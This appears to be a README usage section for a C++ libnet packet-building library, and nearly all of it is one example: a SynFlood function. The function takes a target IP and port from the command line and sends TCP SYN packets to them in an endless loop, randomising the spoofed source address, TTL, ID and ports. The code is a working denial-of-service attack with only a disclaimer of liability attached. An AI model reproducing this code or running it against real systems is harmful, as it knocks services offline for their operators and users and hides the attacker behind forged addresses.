# How to use

## Simulating TCP SYN FLOOD (Use caution not liable for damages caused)
```cpp
void SynFlood(char *argv[])
{
    LibnetContext ctx{InjectionType::Raw4};
    Builder builder{ctx};
    size_t packetSize = LIBNET_IPV4_H + LIBNET_TCP_H;

    IP destIp{ctx, argv[1], IPType::V4};
    IP srcIp{ctx};
    Port port{static_cast<uint16_t>(atoi(argv[2]))};

    ctx.seedPrand();
    std::cout << "SYN Flooding port " << port
              << " of " << destIp << " ...\n";

    while (true)
    {
        /*random id*/
        auto id = static_cast<uint16_t>(Functions::getPrand(Range::Pru16));
        /*random ip address*/
        auto randIp = Functions::getPrand(Range::Pru32);
        srcIp = randIp;
        /*random ttl*/
        auto ttl = static_cast<uint8_t>(Functions::getPrand(Range::Pr8));
        /*src port random*/
        auto srcPort = static_cast<uint16_t>(Functions::getPrand(Range::Pru16));
        builder.buildTcp(srcPort, port, Functions::getPrand(Range::Pru32),
                         Functions::getPrand(Range::Pru32), TH_SYN,
                         Functions::getPrand(Range::Pru16), 0, 0, LIBNET_IPV4_H, NULL, 0, 0);
        builder.buildIpV4(LIBNET_TCP_H, IPTOS_LOWDELAY, id, 0, ttl,
                          IPPROTO_TCP, 0, srcIp, destIp, NULL, 0, 0);
        sleep(FloodDelay());

        ctx.write();
        ctx.clearPacket();
    }
}
```
